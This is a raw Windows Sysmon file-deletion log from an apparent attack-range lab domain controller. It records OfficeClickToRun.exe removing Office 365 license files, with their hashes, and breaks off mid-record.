23542300x800000000000000067262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest5-ul-oob.xrm-msMD5=7D58392478BE0EC143B7D5B11C99140C,SHA256=198D0B4ACC87A9E80F26E5CE2BD19C4BA413623558EEC4F5E4B88E70393E6DCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest5-ppd.xrm-msMD5=7890FB9A79EA81F208AD4C70CA61EBE5,SHA256=839B568E9AFD9FF368C9E04E3886678DD414A263F802D9F06C02AE8855B83973,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest5-pl.xrm-msMD5=05F65CB00F8FE57969D622E2DC4943F5,SHA256=39368EAAD2A5C91421B1EFA68305F04DB52C370391A0B7DE3E19CA848956B174,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest4-ul-oob.xrm-msMD5=3B957E3AB8CDDADF6D3A5C9FB3437550,SHA256=198D692E71DDDA014D544B0BB2709EA79B5007AEE6436C13D50D4E35FB4493F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest4-ppd.xrm-msMD5=70F8401E78C2637520A3AB0C2E530E0F,SHA256=DB2E1BDFA702B4B9FA292CCD3D3FEDDAD514026794C6C3F9E8AB6FAD3C61B93A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest4-pl.xrm-msMD5=381AABDBA4B6DA94AD395E922D258DCF,SHA256=628375C8E39BA2BC738EB450DE79F28B4698A38684004020C5C5BA6955AB1445,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-msMD5=56DF46A14A45EA54CDF2CD7A57654B3C,SHA256=F43C4F5650F35D8E69241ED209FC61D3435106BF138D084A5826D11267895DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest3-ppd.xrm-msMD5=0C454A84E6C0325D5617C7B36EE94850,SHA256=CBC95689BE05ABE49288CFE8AACE91DE5EC945E43F78A89AFB88D5B0D4448018,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest3-pl.xrm-msMD5=0829FC836C85D0EAE142D58A5782AC3A,SHA256=56B67D488BF249E133056208A1D7A02B2533B797639D0ABB9FEF587E4EE2AB47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest2-ul-oob.xrm-msMD5=C4E4745311EA2A0D0053E8ABF0B1D523,SHA256=F10639A5AD807D3208D1C843732D52250C30B53B3FF95C93471EF001D9A8B3FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest2-ppd.xrm-msMD5=1B97A3B6F0D94C6FB311042E3408A44A,SHA256=91368A7E3F98451BC8CCF9F052C3E9381C2473C0A05E4C06D94D0AD3979BBE5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest2-pl.xrm-msMD5=CF6A954A182E36ED44A565BB0DC554E2,SHA256=425C49FC967A7832077BB2791F6E99706D01C9E0514641911936F82356B16434,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest1-ul-oob.xrm-msMD5=98C54A697BF4E2208DD510C0C26E4DA6,SHA256=3BD78CA494253536D2CC4164BF1CE87412F2FE623D076DFA3F323D43CE8205E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest1-ppd.xrm-msMD5=24DFF405A04D8AA69CC39568A049A3CF,SHA256=66152AF80D4E2FA49F5BC04011CAE36D5D94508BCA454D89D069F5456D226F5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTest1-pl.xrm-msMD5=98A39953715F87ECBB0BF2C38FA7D6B0,SHA256=703C4386A13545352F1084E2689E9E6B4104DA939B8A60F169B6B4947D6FDD9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription5-ul-oob.xrm-msMD5=40336D38EC9AF0AD38BEF04D82E8EEB7,SHA256=2A6AA01F4D64BFFBA8D3F2D10C33F05FFB56CEB7CC1C206F9D8BBC9228CE907B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription5-ppd.xrm-msMD5=DB0DA446C74B8FC8BF249961B9E6306A,SHA256=E57487D541CEE4867F2606515D21E8152D3AF2145322E4938B79D99EB64E8886,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription5-pl.xrm-msMD5=83857AFED3DDF20B49E0B680B7CFAB40,SHA256=4E377E3A9AD1976C3D62747398BB130CD34C6A8B78F8E052A36BD8379AE91390,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription4-ul-oob.xrm-msMD5=3AEC059633CBBB1743882D6618405BC9,SHA256=A2CD0C215AB7914E7D58ED0E7459318C9138EB143F84AB1D1A38911ABB0B83F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription4-ppd.xrm-msMD5=34784DB14EDB2C2E362596929FB4B5E4,SHA256=F9FA9C1511F52AFF4B56856CA9B383DDD0947E4E107705DF7D145F1B349D3DB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription4-pl.xrm-msMD5=796BD230C60864B0AE5FAB97CD342B4D,SHA256=ED734823C88822FEB764964AE477191B7AB1326614EA6F344789F54F5E13A5C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription3-ul-oob.xrm-msMD5=9FC57B5D0AA5A5BBF5186F33C4BAC365,SHA256=2FAB13FA898F14EFA7763AB77B946304EC5A2B0FD13C075DC711A84443C2D214,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription3-ppd.xrm-msMD5=D74D336A850D9553AFE18FAEFE43E007,SHA256=0BFC6C655AC67FA754EC0B28E623A3BECB91EBED7AA0643134D7419265146A15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription3-pl.xrm-msMD5=EE43DD65B9CAA85A07E26219AFA0FCAF,SHA256=15DB750DE3AFC93F1A0C86FC5FF90DF55510B6301F587C2124D2196F5AA6AA9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription2-ul-oob.xrm-msMD5=953960D61DC9A2788163C4A0961CC787,SHA256=133FCB1F3D6C1969B96EED1E7CC40F609A654BCEE90854E4D69D801B1C3A03BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription2-ppd.xrm-msMD5=F6CE83FB7F371243339CAA2A08690F19,SHA256=9136457B4217FD971D5820BB55D0DBF96B0AC8AE7AFD325B0EBD45588D53D94D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription2-pl.xrm-msMD5=3D164090384C60CCBB22A75D0C4A40B8,SHA256=CC8365651CE320513A84780A3208D6636E5EC49D74890DCD7FAB33B4D1C391F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription1-ul-oob.xrm-msMD5=6D97E2B53B997E9BC4431318989B0376,SHA256=C7B5EDB6FA4454D11B10009FA4D72B1C6B1AE5EAD0CD1A8B5092CCE118096AA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription1-ppd.xrm-msMD5=D40C1C2BBB2DEFAB07255670C4220DA8,SHA256=5BD71738995A63D5F214503C2586FBBE92604216A2E627C9839C7EBFFF444459,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Subscription1-pl.xrm-msMD5=0B809F1CA5C5D044004A0770336A3C81,SHA256=67824013C1D0731975F10B41A41313B45FA6919845CE9890CDD2FC6CE6278D76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Grace-ul-oob.xrm-msMD5=6A352904F7C749AEF3BBAE9FD986A80B,SHA256=624754CA41171E304CB782E17ED0BA65FC71DE464017977EC2BF0782513BA304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_Grace-ppd.xrm-msMD5=0759115A60A849807336650F8A669D40,SHA256=C8DE1C4528F12D39F46D191DC9F586B835EA9AFADF5D7EA288010BDAB88C6F10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremDemoR_BypassTrial365-ul-oob.xrm-msMD5=3DD870C5B25B38E8C4136EFAECA8DF25,SHA256=5F45633D161D888531EC1A067A76971B7AED4BF266357A19652AE856EB5D2877,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremDemoR_BypassTrial365-ppd.xrm-msMD5=ECC07596DE0F13191D4B97C572205DFB,SHA256=866B81BED0F7C3DF6BF0D8CA29EA12444BFD7FF5ABDEE16DC3404BD336824D45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365EduCloudEDUR_SubTrial-ul-oob.xrm-msMD5=95601EB206ECBD1BF3F31102AE38C1E6,SHA256=99F923B6077B172F898E6C0147F4DD53C572E96F1E179F8CAE9E90B463EEBBF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365EduCloudEDUR_SubTrial-ppd.xrm-msMD5=47C7132E246D137FED920D62CF128838,SHA256=1856A73499B2C6A9C1DE6B13A3FABB7EF87FE744E7FA52D109E6C74F78C6F9B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365EduCloudEDUR_SubTrial-pl.xrm-msMD5=B08C4CF7A2B772648ED23136F9F326A5,SHA256=55D035941952724CE4D964B9234F885EA9EBB1AF353383CEA9F601F1DB890EB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365EduCloudEDUR_Subscription-ul-oob.xrm-msMD5=3BFA789EA38A9230EB3DA7844C81FB8E,SHA256=176CC9EE9CBB15904D9BB11F1A48FF5A4BAB8AFB16BC4AE51DF396D113318A98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365EduCloudEDUR_Subscription-ppd.xrm-msMD5=83447DCDE034668F39781101B767C522,SHA256=4FAF56DD4F8FE5B8E642515A985AC584D9F686FDE7F0B57505A84B5375B2D3DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365EduCloudEDUR_Subscription-pl.xrm-msMD5=D237F199B77F02885AEFBE44DB69D65E,SHA256=8392F0A52D7B1051D9DDEF433007CA856EC8F930CEF8631BD1AB9AF9651A3D43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365EduCloudEDUR_Grace-ul-oob.xrm-msMD5=10FB577DB04853D647D4B3B9DDC93D96,SHA256=0F7EDA36EBB178B1FD00B5A86F64950DC7A4AE8D11B1292E8C43473B68ABE178,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365EduCloudEDUR_Grace-ppd.xrm-msMD5=FD4A5D0113B939E664EB90EC57CD60C6,SHA256=C83DE80E6CD99DDFB6E37A93F3B6E10F165421065F875E86EC78938E63730550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_SubTrial-ul-oob.xrm-msMD5=2A6E0F2B3A918EA6BD820226B380E6B4,SHA256=9C3E72CBDC913DE7240AB399E1F5BB2074967AE38387DD8A36FE319ED65D8A19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 